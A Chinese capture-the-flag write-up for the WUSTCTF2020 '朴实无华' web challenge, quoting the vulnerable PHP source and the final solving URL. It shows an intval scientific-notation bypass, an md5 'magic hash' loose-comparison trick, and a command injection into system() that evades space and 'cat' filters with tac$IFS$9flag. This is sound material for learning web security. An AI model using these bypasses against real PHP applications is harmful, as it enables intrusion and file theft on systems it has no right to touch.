本文详细介绍了在WUSTCTF2020中遇到的一个朴实无华的挑战。通过浏览器标题的乱码提示,发现编码需调整为unicode。在robots.txt中找到/fAke_f1agggg.php,但直接访问无果。使用Burp Suite代理,从响应头中揭示/fl4g.php。接着进行代码审计,注意到intval的2e5返回值和md5的0e215962017特性。利用PHP弱等于和0e开头的特性来绕过限制,最终通过参数num、md5和get_flag获取flag。
浏览器标题有乱码 编码调成unicode
robots.txt : /fAke_f1agggg.php
访问 后啥也没有 用burp看 这里必须采用代理拦截 不拦截 啥都看不到
burp里右边响应头里有提示,/fl4g.php
然后代码审计
//level 1
if (isset($_GET['num'])){
$num = $_GET['num'];
if(intval($num) < 2020 && intval($num + 1) > 2021){
echo "我不经意间看了看我的劳力士, 不是想看时间, 只是想不经意间, 让你知道我过得比你好.</br>";
}else{
die("金钱解决不了穷人的本质问题");
}
}else{
die("去非洲吧");
}
//level 2
if (isset($_GET['md5'])){
$md5=$_GET['md5'];
if ($md5==md5($md5))
echo "想到这个CTFer拿到flag后, 感激涕零, 跑去东澜岸, 找一家餐厅, 把厨师轰出去, 自己炒两个拿手小菜, 倒一杯散装白酒, 致富有道, 别学小暴.</br>";
else
die("我赶紧喊来我的酒肉朋友, 他打了个电话, 把他一家安排到了非洲");
}else{
die("去非洲吧");
}
//get flag
if (isset($_GET['get_flag'])){
$get_flag = $_GET['get_flag'];
if(!strstr($get_flag," ")){
$get_flag = str_ireplace("cat", "wctf2020", $get_flag);
echo "想到这里, 我充实而欣慰, 有钱人的快乐往往就是这么的朴实无华, 且枯燥.</br>";
system($get_flag);
}else{
die("快到非洲了");
}
}else{
die("去非洲吧");
}
?>
去非洲吧
intval 2e5返回2
md5=0e215962017
php弱等于 0e开头后面纯数字的字符串都相等 0e开头后接数字字符串md5后还是0e开头后接数字
先看看有啥文件 再绕过cat和空格
?num=2e5&md5=0e215962017&get_flag=tac$IFS$9flag
扫一扫
845
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
